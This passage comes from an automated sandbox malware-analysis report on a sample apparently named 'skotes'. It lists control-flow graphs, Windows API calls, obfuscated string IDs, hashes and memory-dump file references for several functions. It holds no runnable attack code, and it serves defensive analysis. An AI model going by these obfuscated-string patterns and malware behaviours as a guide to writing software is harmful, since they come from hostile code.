                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: #$111$246122658369$9c9aa5$GnNoc2Hc$L1g$MGE+$MQ==$UA==$WDw=$WTs=$WTw=
                                                                                                                                                                    • API String ID: 0-2801840564
                                                                                                                                                                    • Opcode ID: e7118f93191bf03ab6225e14171246e745ac3b0e42ef8fac215c60512335fc54
                                                                                                                                                                    • Instruction ID: 9722082d08f01c99a5b9ac1f3a293e2968caf1aa8f36545aee7c2ded2f72136e
                                                                                                                                                                    • Opcode Fuzzy Hash: e7118f93191bf03ab6225e14171246e745ac3b0e42ef8fac215c60512335fc54
                                                                                                                                                                    • Instruction Fuzzy Hash: F582C270904298DBEF14EF68C949BDE7FB7AB46304F548588E805273C2D7759A88CBD2
                                                                                                                                                                    Function 00652517 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 374timeCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 2054 652517-65253f call 652133 call 652191 2059 6526e5-65271a call 646c87 call 652133 call 652191 2054->2059 2060 652545-652551 call 652139 2054->2060 2086 652720-65272c call 652139 2059->2086 2087 652842-65289e call 646c87 call 6562ee 2059->2087 2060->2059 2065 652557-652562 2060->2065 2067 652564-652566 2065->2067 2068 652598-6525a1 call 64adf5 2065->2068 2071 652568-65256c 2067->2071 2077 6525a4-6525a9 2068->2077 2074 65256e-652570 2071->2074 2075 652588-65258a 2071->2075 2078 652584-652586 2074->2078 2079 652572-652578 2074->2079 2080 65258d-65258f 2075->2080 2077->2077 2082 6525ab-6525cc call 64b04b call 64adf5 2077->2082 2078->2080 2079->2075 2083 65257a-652582 2079->2083 2084 652595 2080->2084 2085 6526e1-6526e4 2080->2085 2082->2085 2102 6525d2-6525d5 2082->2102 2083->2071 2083->2078 2084->2068 2086->2087 2094 652732-65273e call 652165 2086->2094 2104 6528a0-6528a6 2087->2104 2105 6528a8-6528ab 2087->2105 2094->2087 2103 652744-652765 call 64adf5 GetTimeZoneInformation 2094->2103 2106 6525d8-6525dd 2102->2106 2118 652820-652841 call 65212d call 652121 call 652127 2103->2118 2119 65276b-65278c 2103->2119 2108 6528ee-652900 2104->2108 2105->2108 2110 6528ad-6528bd call 64b04b 2105->2110 2106->2106 2109 6525df-6525f1 call 64a1f1 2106->2109 2112 652910 2108->2112 2113 652902-652905 2108->2113 2109->2059 2127 6525f7-65260a call 654b17 2109->2127 2129 6528c7-6528e0 call 6562ee 2110->2129 2130 6528bf 2110->2130 2116 652915-65292a call 64adf5 call 62cff1 2112->2116 2117 652910 call 6526f2 2112->2117 2113->2112 2120 652907-65290e call 652517 2113->2120 2117->2116 2123 652796-65279d 2119->2123 2124 65278e-652793 2119->2124 2120->2116 2134 6527af-6527b1 2123->2134 2135 65279f-6527a6 2123->2135 2124->2123 2127->2059 2146 652610-652613 2127->2146 2149 6528e5-6528eb call 64adf5 2129->2149 2150 6528e2-6528e3 2129->2150 2132 6528c0-6528c5 call 64adf5 2130->2132 2156 6528ed 2132->2156 2143 6527b3-6527dc call 64ef17 call 64e926 2134->2143 2135->2134 2142 6527a8-6527ad 2135->2142 2142->2143 2166 6527de-6527e1 2143->2166 2167 6527ea-6527ec 2143->2167 2154 652615-652619 2146->2154 2155 65261b-652621 2146->2155 2149->2156 2150->2132 2154->2146 2154->2155 2161 652624-652631 call 648bbe 2155->2161 2162 652623 2155->2162 2156->2108 2171 652634-652639 2161->2171 2162->2161 2166->2167 2169 6527e3-6527e8 2166->2169 2170 6527ee-65280c call 64e926 2167->2170 2169->2170 2177 65280e-652811 2170->2177 2178 65281b-65281e 2170->2178 2173 652642-652643 2171->2173 2174 65263b-652640 2171->2174 2173->2171 2174->2173 2176 652645-652648 2174->2176 2179 652696-652699 2176->2179 2180 65264a-652661 call 648bbe 2176->2180 2177->2178 2181 652813-652819 2177->2181 2178->2118 2182 6526a0-6526b4 2179->2182 2183 65269b-65269d 2179->2183 2190 652675-652677 2180->2190 2191 652663 2180->2191 2181->2118 2185 6526b6-6526c6 call 654b17 2182->2185 2186 6526ca 2182->2186 2183->2182 2185->2059 2199 6526c8 2185->2199 2188 6526cd-6526df call 65212d call 652121 2186->2188 2188->2085 2190->2179 2193 652679-652689 call 648bbe 2190->2193 2195 652665-65266a 2191->2195 2203 652690-652694 2193->2203 2195->2190 2196 65266c-652673 2195->2196 2196->2190 2196->2195 2199->2188 2203->2179 2204 65268b-65268d 2203->2204 2204->2179 2205 65268f 2204->2205 2205->2203
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00666758), ref: 0065275C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InformationTimeZone
                                                                                                                                                                    • String ID: Eastern Standard Time$Eastern Summer Time$Xgf
                                                                                                                                                                    • API String ID: 565725191-1895067171
                                                                                                                                                                    • Opcode ID: 42749e733722a34371e3c915c2065470bf23ceab17b5f4f298f9bb1ed5d3f07e
                                                                                                                                                                    • Instruction ID: 635e08537ac3f31de713c5db76817b95010f375c74ca142777ced542c57db768
                                                                                                                                                                    • Opcode Fuzzy Hash: 42749e733722a34371e3c915c2065470bf23ceab17b5f4f298f9bb1ed5d3f07e
                                                                                                                                                                    • Instruction Fuzzy Hash: A7C12671900206AFDB249F68CC61AEE7BABEF57311F24005DED9597392E7308E49C754
                                                                                                                                                                    Function 006165E0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 2206 6165e0-616639 2280 61663a call 4e70c06 2206->2280 2281 61663a call 4e70c42 2206->2281 2282 61663a call 4e70bed 2206->2282 2283 61663a call 4e70bcd 2206->2283 2284 61663a call 4e70b57 2206->2284 2285 61663a call 4e70c36 2206->2285 2286 61663a call 4e70b76 2206->2286 2287 61663a call 4e70bb4 2206->2287 2288 61663a call 4e70b90 2206->2288 2289 61663a call 4e70c5f 2206->2289 2290 61663a call 4e70b9e 2206->2290 2291 61663a call 4e70c7c 2206->2291 2292 61663a call 4e70c99 2206->2292 2207 61663f-6166b8 LookupAccountNameA call 627a00 call 615c10 2213 6166ba 2207->2213 2214 6166bc-6166db call 6122c0 2207->2214 2213->2214 2217 6166dd-6166ec 2214->2217 2218 61670c-616712 2214->2218 2219 616702-616709 call 62d663 2217->2219 2220 6166ee-6166fc 2217->2220 2221 616715-61671a 2218->2221 2219->2218 2220->2219 2223 616937 call 646c6a 2220->2223 2221->2221 2222 61671c-616744 call 627a00 call 615c10 2221->2222 2234 616746 2222->2234 2235 616748-616769 call 6122c0 2222->2235 2229 61693c call 646c6a 2223->2229 2233 616941-616946 call 646c6a 2229->2233 2234->2235 2240 61676b-61677a 2235->2240 2241 61679a-6167ae 2235->2241 2242 616790-616797 call 62d663 2240->2242 2243 61677c-61678a 2240->2243 2246 6167b4-6167ba 2241->2246 2247 616858-61687c 2241->2247 2242->2241 2243->2229 2243->2242 2249 6167c0-6167ed call 627a00 call 615c10 2246->2249 2250 616880-616885 2247->2250 2264 6167f1-616818 call 6122c0 2249->2264 2265 6167ef 2249->2265 2250->2250 2251 616887-6168ec call 6280c0 * 2 2250->2251 2261 616919-616936 call 62cff1 2251->2261 2262 6168ee-6168fd 2251->2262 2266 61690f-616916 call 62d663 2262->2266 2267 6168ff-61690d 2262->2267 2273 616849-61684c 2264->2273 2274 61681a-616829 2264->2274 2265->2264 2266->2261 2267->2233 2267->2266 2273->2249 2275 616852 2273->2275 2276 61682b-616839 2274->2276 2277 61683f-616846 call 62d663 2274->2277 2275->2247 2276->2223 2276->2277 2277->2273 2280->2207 2281->2207 2282->2207 2283->2207 2284->2207 2285->2207 2286->2207 2287->2207 2288->2207 2289->2207 2290->2207 2291->2207 2292->2207
                                                                                                                                                                    APIs
                                                                                                                                                                    • LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00616680
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AccountLookupName
                                                                                                                                                                    • String ID: GSTmfV==$ISNmfV==$RySfdMLx
                                                                                                                                                                    • API String ID: 1484870144-2309319047
                                                                                                                                                                    • Opcode ID: d136207430fcf07575afdf9bd19db1bbca1ec7e2b903d4f2356b1205364c814e
                                                                                                                                                                    • Instruction ID: c26cff28e34ee6c1e2bb85ea2f8e73c3035a983611b5368412a5322a90523f59
                                                                                                                                                                    • Opcode Fuzzy Hash: d136207430fcf07575afdf9bd19db1bbca1ec7e2b903d4f2356b1205364c814e
                                                                                                                                                                    • Instruction Fuzzy Hash: EE91B2B19001289BDB28DF28CC85BEDB77AEB45304F4445EDF51997282DA359BC4CFA8
                                                                                                                                                                    Function 0061EB4E Relevance: 31.9, APIs: 3, Strings: 14, Instructions: 2131COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 0061EB51
                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000), ref: 0061EC83
                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 0061ED98
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesFile$CreateDirectory
